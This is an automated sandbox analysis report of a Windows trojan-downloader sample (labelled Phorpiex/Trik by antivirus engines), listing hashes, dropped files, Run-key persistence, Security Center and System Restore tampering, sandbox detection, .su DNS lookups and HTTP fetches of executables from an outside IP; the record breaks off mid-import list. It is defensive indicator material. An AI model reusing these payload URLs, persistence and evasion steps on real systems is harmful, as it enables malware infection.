Exes_56c329b835490a887a6a941adfa6e4c2_exe.json

1.  
2. [*] MalFamily: ""
3.  
4. [*] MalScore: 10.0
5.  
6. [*] File Name: "Exes_56c329b835490a887a6a941adfa6e4c2.exe"
7. [*] File Size: 292352
8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9. [*] SHA256: "fa9020c32b1c1b810b6c261e77863411bc64e70aed6d2a3bbbb82ebdcbaf8740"
10. [*] MD5: "56c329b835490a887a6a941adfa6e4c2"
11. [*] SHA1: "fa831efbbe48deb179980e00042c91ae99d5bf20"
12. [*] SHA512: "a29b5ae11a016b6d64bbd482416e476525f6e67d34e11485aa47a6e361a0b451492d4422647b0a79a9f69086c85faed987236ebafb9c80410a5c9efe7c7bcba9"
13. [*] CRC32: "0DF89228"
14. [*] SSDEEP: "6144:UvTr7niBcKnBGNYzF4BupEjMvFs4/2bR4d:637nOcKByKF4BAEQO4/O4d"
15.  
16. [*] Process Execution: [
17. "Exes_56c329b835490a887a6a941adfa6e4c2.exe",
18. "winmonw.exe",
19. "1017334714.exe",
20. "3625111283.exe"
21. ]
22.  
23. [*] Signatures Detected: [
24. {
25. "Description": "Creates RWX memory",
26. "Details": []
27. },
28. {
29. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
30. "Details": []
31. },
32. {
33. "Description": "Drops a binary and executes it",
34. "Details": [
35. {
36. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe"
37. },
38. {
39. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
40. },
41. {
42. "binary": "C:\\Windows\\3356173911556488\\winmonw.exe"
43. }
44. ]
45. },
46. {
47. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
48. "Details": [
49. {
50. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
51. },
52. {
53. "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
54. },
55. {
56. "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
57. },
58. {
59. "suspicious_request": "http://193.32.161.77/1.exe"
60. },
61. {
62. "suspicious_request": "http://193.32.161.77/2.exe"
63. },
64. {
65. "suspicious_request": "http://193.32.161.77/3.exe"
66. },
67. {
68. "suspicious_request": "http://193.32.161.77/4.exe"
69. },
70. {
71. "suspicious_request": "http://193.32.161.77/5.exe"
72. },
73. {
74. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
75. },
76. {
77. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
78. },
79. {
80. "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
81. }
82. ]
83. },
84. {
85. "Description": "Performs some HTTP requests",
86. "Details": [
87. {
88. "url": "http://193.32.161.77/tldr.php?new=1"
89. },
90. {
91. "url": "http://193.32.161.77/tldr.php?on=1"
92. },
93. {
94. "url": "http://193.32.161.77/1.exe"
95. },
96. {
97. "url": "http://193.32.161.77/2.exe"
98. },
99. {
100. "url": "http://193.32.161.77/3.exe"
101. },
102. {
103. "url": "http://193.32.161.77/4.exe"
104. },
105. {
106. "url": "http://193.32.161.77/5.exe"
107. },
108. {
109. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
110. },
111. {
112. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
113. },
114. {
115. "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
116. }
117. ]
118. },
119. {
120. "Description": "Detects Sandboxie through the presence of a library",
121. "Details": []
122. },
123. {
124. "Description": "Detects SunBelt Sandbox through the presence of a library",
125. "Details": []
126. },
127. {
128. "Description": "Attempts to remove evidence of file being downloaded from the Internet",
129. "Details": [
130. {
131. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe:Zone.Identifier"
132. }
133. ]
134. },
135. {
136. "Description": "Installs itself for autorun at Windows startup",
137. "Details": [
138. {
139. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
140. },
141. {
142. "data": "C:\\Windows\\3356173911556488\\winmonw.exe"
143. },
144. {
145. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
146. },
147. {
148. "data": "C:\\Windows\\3356173911556488\\winmonw.exe"
149. }
150. ]
151. },
152. {
153. "Description": "Creates a hidden or system file",
154. "Details": [
155. {
156. "file": "C:\\Windows\\3356173911556488"
157. },
158. {
159. "file": "C:\\Windows\\3356173911556488\\winmonw.exe"
160. },
161. {
162. "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
163. }
164. ]
165. },
166. {
167. "Description": "File has been identified by 38 Antiviruses on VirusTotal as malicious",
168. "Details": [
169. {
170. "MicroWorld-eScan": "Trojan.GenericKD.41379811"
171. },
172. {
173. "FireEye": "Generic.mg.56c329b835490a88"
174. },
175. {
176. "McAfee": "Trojan-FQZA!56C329B83549"
177. },
178. {
179. "AegisLab": "Trojan.Win32.Generic.mnLK"
180. },
181. {
182. "K7AntiVirus": "Riskware ( 0040eff71 )"
183. },
184. {
185. "Cybereason": "malicious.bbe48d"
186. },
187. {
188. "Symantec": "ML.Attribute.HighConfidence"
189. },
190. {
191. "ESET-NOD32": "a variant of Win32/Kryptik.GUBX"
192. },
193. {
194. "APEX": "Malicious"
195. },
196. {
197. "Paloalto": "generic.ml"
198. },
199. {
200. "Kaspersky": "Trojan-Downloader.Win32.Trik.fx"
201. },
202. {
203. "BitDefender": "Trojan.GenericKD.41379811"
204. },
205. {
206. "Avast": "Win32:Trojan-gen"
207. },
208. {
209. "Ad-Aware": "Trojan.Ransomware.GenericKDS.32066721"
210. },
211. {
212. "Comodo": "TrojWare.Win32.Fakecsrss.AV@88nqyj"
213. },
214. {
215. "F-Secure": "Trojan.TR/AD.Phorpiex.vkkfn"
216. },
217. {
218. "Invincea": "heuristic"
219. },
220. {
221. "McAfee-GW-Edition": "BehavesLike.Win32.Generic.dh"
222. },
223. {
224. "Emsisoft": "Trojan.GenericKD.41379811 (B)"
225. },
226. {
227. "Endgame": "malicious (high confidence)"
228. },
229. {
230. "Avira": "TR/AD.Phorpiex.vkkfn"
231. },
232. {
233. "Microsoft": "Trojan:Win32/Fuery.A!cl"
234. },
235. {
236. "Arcabit": "Trojan.Ransomware.GenericS.D1E94CA1"
237. },
238. {
239. "ViRobot": "Trojan.Win32.Z.Highconfidence.292352.B"
240. },
241. {
242. "ZoneAlarm": "Trojan-Downloader.Win32.Trik.fx"
243. },
244. {
245. "GData": "Win32.Worm.Phorpiex.402DNM"
246. },
247. {
248. "AhnLab-V3": "Malware/Win32.Generic.C3291999"
249. },
250. {
251. "Acronis": "suspicious"
252. },
253. {
254. "VBA32": "BScope.Trojan.Sehyioa"
255. },
256. {
257. "Cylance": "Unsafe"
258. },
259. {
260. "Rising": "Trojan.Fuery!8.EAFB (CLOUD)"
261. },
262. {
263. "SentinelOne": "DFI - Suspicious PE"
264. },
265. {
266. "Fortinet": "W32/Kryptik.GUBX!tr"
267. },
268. {
269. "MaxSecure": "Ransomeware.GandCrypt.Gen"
270. },
271. {
272. "AVG": "Win32:Trojan-gen"
273. },
274. {
275. "Panda": "Trj/Genetic.gen"
276. },
277. {
278. "CrowdStrike": "win/malicious_confidence_70% (W)"
279. },
280. {
281. "Qihoo-360": "HEUR/QVM10.2.F183.Malware.Gen"
282. }
283. ]
284. },
285. {
286. "Description": "Operates on local firewall's policies and settings",
287. "Details": []
288. },
289. {
290. "Description": "Creates a copy of itself",
291. "Details": [
292. {
293. "copy": "C:\\Windows\\3356173911556488\\winmonw.exe"
294. },
295. {
296. "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe"
297. }
298. ]
299. },
300. {
301. "Description": "Attempts to disable System Restore",
302. "Details": []
303. },
304. {
305. "Description": "Attempts to modify or disable Security Center warnings",
306. "Details": []
307. },
308. {
309. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
310. "Details": [
311. {
312. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_56c329b835490a887a6a941adfa6e4c2.exe:Zone.Iduentifier"
313. },
314. {
315. "file": "C:\\Windows\\3356173911556488\\winmonw.exe:Zone.Iduentifier"
316. }
317. ]
318. },
319. {
320. "Description": "Created network traffic indicative of malicious activity",
321. "Details": [
322. {
323. "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
324. },
325. {
326. "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
327. }
328. ]
329. }
330. ]
331.  
332. [*] Started Service: []
333.  
334. [*] Executed Commands: [
335. "C:\\Windows\\3356173911556488\\winmonw.exe",
336. "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe",
337. "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
338. ]
339.  
340. [*] Mutexes: [
341. "4550003930"
342. ]
343.  
344. [*] Modified Files: [
345. "C:\\Windows\\3356173911556488\\winmonw.exe",
346. "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
347. "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe",
348. "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe"
349. ]
350.  
351. [*] Deleted Files: [
352. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_56c329b835490a887a6a941adfa6e4c2.exe:Zone.Iduentifier",
353. "C:\\Windows\\3356173911556488\\winmonw.exe:Zone.Iduentifier",
354. "C:\\Users\\user\\AppData\\Local\\Temp\\1017334714.exe:Zone.Identifier",
355. "C:\\Users\\user\\AppData\\Local\\Temp\\3625111283.exe:Zone.Identifier"
356. ]
357.  
358. [*] Modified Registry Keys: [
359. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
360. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
361. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
362. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
363. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
364. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
365. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
366. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
367. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
368. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
369. ]
370.  
371. [*] Deleted Registry Keys: []
372.  
373. [*] DNS Communications: [
374. {
375. "type": "A",
376. "request": "aiheiufisd.su",
377. "answers": [
378. {
379. "data": "",
380. "type": "NXDOMAIN"
381. }
382. ]
383. },
384. {
385. "type": "A",
386. "request": "aeoghehofu.su",
387. "answers": [
388. {
389. "data": "",
390. "type": "NXDOMAIN"
391. }
392. ]
393. },
394. {
395. "type": "A",
396. "request": "aniaeninie.su",
397. "answers": [
398. {
399. "data": "",
400. "type": "NXDOMAIN"
401. }
402. ]
403. },
404. {
405. "type": "A",
406. "request": "aiaeufaehe.su",
407. "answers": [
408. {
409. "data": "",
410. "type": "NXDOMAIN"
411. }
412. ]
413. },
414. {
415. "type": "A",
416. "request": "aieieieros.su",
417. "answers": [
418. {
419. "data": "",
420. "type": "NXDOMAIN"
421. }
422. ]
423. },
424. {
425. "type": "A",
426. "request": "abaeubuegs.su",
427. "answers": [
428. {
429. "data": "",
430. "type": "NXDOMAIN"
431. }
432. ]
433. },
434. {
435. "type": "A",
436. "request": "aeubeufubg.su",
437. "answers": [
438. {
439. "data": "",
440. "type": "NXDOMAIN"
441. }
442. ]
443. },
444. {
445. "type": "A",
446. "request": "aeuaueudgs.su",
447. "answers": [
448. {
449. "data": "",
450. "type": "NXDOMAIN"
451. }
452. ]
453. },
454. {
455. "type": "A",
456. "request": "xiheiufisd.su",
457. "answers": [
458. {
459. "data": "",
460. "type": "NXDOMAIN"
461. }
462. ]
463. },
464. {
465. "type": "A",
466. "request": "xeoghehofu.su",
467. "answers": [
468. {
469. "data": "",
470. "type": "NXDOMAIN"
471. }
472. ]
473. },
474. {
475. "type": "A",
476. "request": "xniaeninie.su",
477. "answers": [
478. {
479. "data": "",
480. "type": "NXDOMAIN"
481. }
482. ]
483. },
484. {
485. "type": "A",
486. "request": "xiaeufaehe.su",
487. "answers": [
488. {
489. "data": "",
490. "type": "NXDOMAIN"
491. }
492. ]
493. },
494. {
495. "type": "A",
496. "request": "xieieieros.su",
497. "answers": [
498. {
499. "data": "",
500. "type": "NXDOMAIN"
501. }
502. ]
503. },
504. {
505. "type": "A",
506. "request": "xbaeubuegs.su",
507. "answers": [
508. {
509. "data": "",
510. "type": "NXDOMAIN"
511. }
512. ]
513. },
514. {
515. "type": "A",
516. "request": "teubeufubg.su",
517. "answers": [
518. {
519. "data": "",
520. "type": "NXDOMAIN"
521. }
522. ]
523. },
524. {
525. "type": "A",
526. "request": "teuaueudgs.su",
527. "answers": [
528. {
529. "data": "",
530. "type": "NXDOMAIN"
531. }
532. ]
533. },
534. {
535. "type": "A",
536. "request": "tiheiufisd.su",
537. "answers": [
538. {
539. "data": "",
540. "type": "NXDOMAIN"
541. }
542. ]
543. },
544. {
545. "type": "A",
546. "request": "teoghehofu.su",
547. "answers": [
548. {
549. "data": "",
550. "type": "NXDOMAIN"
551. }
552. ]
553. },
554. {
555. "type": "A",
556. "request": "tniaeninie.su",
557. "answers": [
558. {
559. "data": "",
560. "type": "NXDOMAIN"
561. }
562. ]
563. },
564. {
565. "type": "A",
566. "request": "tiaeufaehe.su",
567. "answers": [
568. {
569. "data": "",
570. "type": "NXDOMAIN"
571. }
572. ]
573. },
574. {
575. "type": "A",
576. "request": "tieieieros.su",
577. "answers": [
578. {
579. "data": "",
580. "type": "NXDOMAIN"
581. }
582. ]
583. },
584. {
585. "type": "A",
586. "request": "tbaeubuegs.su",
587. "answers": [
588. {
589. "data": "",
590. "type": "NXDOMAIN"
591. }
592. ]
593. },
594. {
595. "type": "A",
596. "request": "wiheiufisd.su",
597. "answers": [
598. {
599. "data": "",
600. "type": "NXDOMAIN"
601. }
602. ]
603. },
604. {
605. "type": "A",
606. "request": "weoghehofu.su",
607. "answers": [
608. {
609. "data": "",
610. "type": "NXDOMAIN"
611. }
612. ]
613. },
614. {
615. "type": "A",
616. "request": "wniaeninie.su",
617. "answers": [
618. {
619. "data": "",
620. "type": "NXDOMAIN"
621. }
622. ]
623. },
624. {
625. "type": "A",
626. "request": "wiaeufaehe.su",
627. "answers": [
628. {
629. "data": "",
630. "type": "NXDOMAIN"
631. }
632. ]
633. },
634. {
635. "type": "A",
636. "request": "wieieieros.su",
637. "answers": [
638. {
639. "data": "",
640. "type": "NXDOMAIN"
641. }
642. ]
643. },
644. {
645. "type": "A",
646. "request": "wbaeubuegs.su",
647. "answers": [
648. {
649. "data": "",
650. "type": "NXDOMAIN"
651. }
652. ]
653. },
654. {
655. "type": "A",
656. "request": "weubeufubg.su",
657. "answers": [
658. {
659. "data": "",
660. "type": "NXDOMAIN"
661. }
662. ]
663. },
664. {
665. "type": "A",
666. "request": "weuaueudgs.su",
667. "answers": [
668. {
669. "data": "",
670. "type": "NXDOMAIN"
671. }
672. ]
673. }
674. ]
675.  
676. [*] Domains: [
677. {
678. "ip": "",
679. "domain": "teubeufubg.su"
680. },
681. {
682. "ip": "",
683. "domain": "tbaeubuegs.su"
684. },
685. {
686. "ip": "",
687. "domain": "wniaeninie.su"
688. },
689. {
690. "ip": "",
691. "domain": "aiaeufaehe.su"
692. },
693. {
694. "ip": "",
695. "domain": "xiheiufisd.su"
696. },
697. {
698. "ip": "",
699. "domain": "teuaueudgs.su"
700. },
701. {
702. "ip": "",
703. "domain": "xbaeubuegs.su"
704. },
705. {
706. "ip": "",
707. "domain": "wiheiufisd.su"
708. },
709. {
710. "ip": "",
711. "domain": "xeoghehofu.su"
712. },
713. {
714. "ip": "",
715. "domain": "wbaeubuegs.su"
716. },
717. {
718. "ip": "",
719. "domain": "abaeubuegs.su"
720. },
721. {
722. "ip": "",
723. "domain": "tieieieros.su"
724. },
725. {
726. "ip": "",
727. "domain": "aeuaueudgs.su"
728. },
729. {
730. "ip": "",
731. "domain": "weubeufubg.su"
732. },
733. {
734. "ip": "",
735. "domain": "wiaeufaehe.su"
736. },
737. {
738. "ip": "",
739. "domain": "aeubeufubg.su"
740. },
741. {
742. "ip": "",
743. "domain": "aeoghehofu.su"
744. },
745. {
746. "ip": "",
747. "domain": "weoghehofu.su"
748. },
749. {
750. "ip": "",
751. "domain": "aniaeninie.su"
752. },
753. {
754. "ip": "",
755. "domain": "xieieieros.su"
756. },
757. {
758. "ip": "",
759. "domain": "wieieieros.su"
760. },
761. {
762. "ip": "",
763. "domain": "tiaeufaehe.su"
764. },
765. {
766. "ip": "",
767. "domain": "aiheiufisd.su"
768. },
769. {
770. "ip": "",
771. "domain": "xiaeufaehe.su"
772. },
773. {
774. "ip": "",
775. "domain": "tniaeninie.su"
776. },
777. {
778. "ip": "",
779. "domain": "xniaeninie.su"
780. },
781. {
782. "ip": "",
783. "domain": "weuaueudgs.su"
784. },
785. {
786. "ip": "",
787. "domain": "teoghehofu.su"
788. },
789. {
790. "ip": "",
791. "domain": "aieieieros.su"
792. },
793. {
794. "ip": "",
795. "domain": "tiheiufisd.su"
796. }
797. ]
798.  
799. [*] Network Communication - ICMP: []
800.  
801. [*] Network Communication - HTTP: [
802. {
803. "count": 1,
804. "body": "",
805. "uri": "http://193.32.161.77/tldr.php?new=1",
806. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
807. "method": "GET",
808. "host": "193.32.161.77",
809. "version": "1.1",
810. "path": "/tldr.php?new=1",
811. "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
812. "port": 80
813. },
814. {
815. "count": 1,
816. "body": "",
817. "uri": "http://193.32.161.77/tldr.php?on=1",
818. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
819. "method": "GET",
820. "host": "193.32.161.77",
821. "version": "1.1",
822. "path": "/tldr.php?on=1",
823. "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
824. "port": 80
825. },
826. {
827. "count": 2,
828. "body": "",
829. "uri": "http://193.32.161.77/1.exe",
830. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
831. "method": "GET",
832. "host": "193.32.161.77",
833. "version": "1.1",
834. "path": "/1.exe",
835. "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
836. "port": 80
837. },
838. {
839. "count": 1,
840. "body": "",
841. "uri": "http://193.32.161.77/2.exe",
842. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
843. "method": "GET",
844. "host": "193.32.161.77",
845. "version": "1.1",
846. "path": "/2.exe",
847. "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
848. "port": 80
849. },
850. {
851. "count": 2,
852. "body": "",
853. "uri": "http://193.32.161.77/3.exe",
854. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
855. "method": "GET",
856. "host": "193.32.161.77",
857. "version": "1.1",
858. "path": "/3.exe",
859. "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
860. "port": 80
861. },
862. {
863. "count": 1,
864. "body": "",
865. "uri": "http://193.32.161.77/4.exe",
866. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
867. "method": "GET",
868. "host": "193.32.161.77",
869. "version": "1.1",
870. "path": "/4.exe",
871. "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
872. "port": 80
873. },
874. {
875. "count": 1,
876. "body": "",
877. "uri": "http://193.32.161.77/5.exe",
878. "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
879. "method": "GET",
880. "host": "193.32.161.77",
881. "version": "1.1",
882. "path": "/5.exe",
883. "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
884. "port": 80
885. },
886. {
887. "count": 1,
888. "body": "",
889. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
890. "user-agent": "Microsoft-CryptoAPI/6.1",
891. "method": "GET",
892. "host": "ocsp.digicert.com",
893. "version": "1.1",
894. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
895. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
896. "port": 80
897. },
898. {
899. "count": 1,
900. "body": "",
901. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
902. "user-agent": "Microsoft-CryptoAPI/6.1",
903. "method": "GET",
904. "host": "ocsp.digicert.com",
905. "version": "1.1",
906. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
907. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
908. "port": 80
909. },
910. {
911. "count": 1,
912. "body": "",
913. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
914. "user-agent": "Microsoft-CryptoAPI/6.1",
915. "method": "GET",
916. "host": "ocsp.digicert.com",
917. "version": "1.1",
918. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
919. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
920. "port": 80
921. }
922. ]
923.  
924. [*] Network Communication - SMTP: []
925.  
926. [*] Network Communication - Hosts: []
927.  
928. [*] Network Communication - IRC: []
929.  
930. [*] Static Analysis: {
931. "pe": {
932. "peid_signatures": null,
933. "imports": [
934. {
935. "imports": [
936. {
937. "name": "FillConsoleOutputCharacterA",
938. "address": "0x42b000"
939. },
940. {
941. "name": "HeapReAlloc",
942. "address": "0x42b004"
943. },
944. {
945. "name": "GetNativeSystemInfo",
946. "address": "0x42b008"
947. },
948. {
949. "name": "SetLocaleInfoA",
950. "address": "0x42b00c"
951. },
952. {
953. "name": "WritePrivateProfileStructA",
954. "address": "0x42b010"
955. },
956. {
957. "name": "GetDefaultCommConfigW",
958. "address": "0x42b014"
959. },
960. {
961. "name": "FindResourceW",
962. "address": "0x42b018"
963. },
964. {
965. "name": "WaitNamedPipeA",
966. "address": "0x42b01c"
967. },
968. {
969. "name": "WaitForSingleObject",
970. "address": "0x42b020"
971. },
972. {
973. "name": "SetTapeParameters",
974. "address": "0x42b024"
975. },
976. {
977. "name": "GetModuleHandleW",
978. "address": "0x42b028"
979. },
980. {
981. "name": "GetTickCount",
982. "address": "0x42b02c"
983. },
984. {
985. "name": "ExpandEnvironmentStringsA",
986. "address": "0x42b030"
987. },
988. {
989. "name": "ReadConsoleW",
990. "address": "0x42b034"
991. },
992. {
993. "name": "FormatMessageA",
994. "address": "0x42b038"
995. },
996. {
997. "name": "EnumTimeFormatsA",
998. "address": "0x42b03c"
999. },
1000. {
1001. "name": "EnumTimeFormatsW",
1002. "address": "0x42b040"
1003. },
1004. {
1005. "name": "GlobalAlloc",
1006. "address": "0x42b044"
1007. },
1008. {
1009. "name": "GetFirmwareEnvironmentVariableA",
1010. "address": "0x42b048"
1011. },
1012. {
1013. "name": "GetStringTypeExW",
1014. "address": "0x42b04c"
1015. },
1016. {
1017. "name": "IsProcessorFeaturePresent",
1018. "address": "0x42b050"
1019. },
1020. {
1021. "name": "GetVolumePathNamesForVolumeNameW",
1022. "address": "0x42b054"
1023. },
1024. {
1025. "name": "ReplaceFileW",
1026. "address": "0x42b058"
1027. },
1028. {
1029. "name": "GetSystemDirectoryA",
1030. "address": "0x42b05c"
1031. },
1032. {
1033. "name": "CreateMailslotW",
1034. "address": "0x42b060"
1035. },
1036. {
1037. "name": "WritePrivateProfileStringW",
1038. "address": "0x42b064"
1039. },
1040. {
1041. "name": "EnumSystemLocalesA",
1042. "address": "0x42b068"
1043. },
1044. {
1045. "name": "VerifyVersionInfoW",
1046. "address": "0x42b06c"
1047. },
1048. {
1049. "name": "GetProfileIntA",
1050. "address": "0x42b070"
1051. },
1052. {
1053. "name": "Module32First",
1054. "address": "0x42b074"
1055. },
